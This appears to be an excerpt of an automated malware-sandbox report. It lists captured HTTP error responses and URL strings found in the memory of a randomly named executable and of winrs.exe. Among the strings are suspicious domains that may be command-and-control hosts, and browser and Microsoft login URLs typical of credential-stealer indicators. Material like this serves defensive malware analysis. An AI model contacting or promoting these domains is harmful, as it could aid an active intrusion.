                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYRZMjvtKDvtYtVb3lYvBpbbqmLG06P6yt9XF5QwA7ZGUcLTM3Q%2BNNmmC4meZ%2FmNdVifSxpekpIcdjl68KTJ2HcBfjbLX7%2FB2x1BhRMRizEqMPJhRL891e7C91C8pYtHsLxZD3zV7rELpGA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed22e0aba441df-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5slkb%2FcdyNrovpIyoAJUiiDdbou1Skt4tZCjQWwi8UtTIjfhG%2FkunzltPodJ5iMYNAVtYwkZEwpawvQyBX2cJva90I%2Fqa3NLA%2BsgeoNjPTqIcjxOwL%2Bicx8AXdGrd8x5AUZyb4%2BE1Ae73J0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed22f0aae64286-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FW46V0Oq5KMVw7ISjMoLV8on3q4mwgE%2BpFRUF1J%2FgMnN1eKtZDRaR%2FJiLQXow9E3I7affssyLs%2FE4cYr5IgLgNpMFlTAOyQkleau2%2FQyhSCRwSxBce3a9soiX19AKkpqf%2FCWrmTnte67NI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed2301f9380fa1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1525&rtt_var=762&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10881&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F10gPv6OCHsUQcbfnGTrcEBymziWM5TIYElYGd2j1jnYhgEGNyAZ8UrI78sAt3xZIZnDBcu3eVWj9HqAQAKUZ3Ok6S%2BALvIx6a9MuPrfHqEmoujCAqYF7yRZIDJQLZI4bb%2BURB3kPstjEPg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed231288975e80-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:14:57 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZWXZpUTestMV0qYYHE2M0J39ZNIz1J1MJ%2BNiLJz5QiPi6KE8pIw%2F96t3LYm3rUP9h2kkFGuoLF7aZaoYNmpm69I6NlUikaorJKRw%2Fou0vg%2BVskHH3HE2muhRthvdtOzr1cIG5JFS28%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed23e17e190f70-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 37 30 0d 0a 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f70\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:14:59 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jybOHATB0uEZm7pKu9%2BpEeRIOLFF38PJIBsVJ9Fi6yR6TUpRujWfH8p50rEUmE3FW9B2C8DNpYL8w%2B8ja7%2BeRduRXe1fFIAoEfS5nbFSk9nzy9LoTgXx0t5TJ%2BoV%2Fv6jZE2OnJl0L2M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed23f17f848cdc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2030&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:15:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:15:02 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bmHic3xQQQFH9%2FrgA7V0HODBCP%2FrwI4z6Q1F7qfKJpUFXk1wZlB09t0tOr4yfgw7nFGQ5P%2F84Xo%2BJtUf3i1muBzfE8OEC6TpBNxjuwtvDLiAfxVlpEzDOX05SpGJJWTxH5R6ImEk3I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed24018f274205-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10872&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:15:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 08 Jan 2025 15:15:04 GMTVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5Uvh9s%2FcUrTyweVGtBN4pIsqy9abNbyWxw8Yjtg0Q1VkgvK7JKYoDTFzyCtjozq7u9VC0nN3Zy46SrBZmlrdzTa3%2FedcNK9dt4Taf%2F%2FxcDqOnH5ky73Gp5a%2Fr9e2M6NaqgveTwL6tk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fed2411787f7cee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 08 Jan 2025 15:15:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 08 Jan 2025 15:15:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 08 Jan 2025 15:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: winrs.exe, 00000003.00000002.3521201601.0000000004098000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000002FD8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3522074275.0000000004D85000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dating-apps-az-dn5.xyz
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3522074275.0000000004D85000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dating-apps-az-dn5.xyz/pn0u/
                Source: winrs.exe, 00000003.00000002.3521201601.00000000043BC000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaX
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www70.earbudsstore.shop/
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winrs.exe, 00000003.00000002.3521201601.0000000004D28000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000003.00000002.3522437440.0000000006070000.00000004.00000800.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000003C68000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
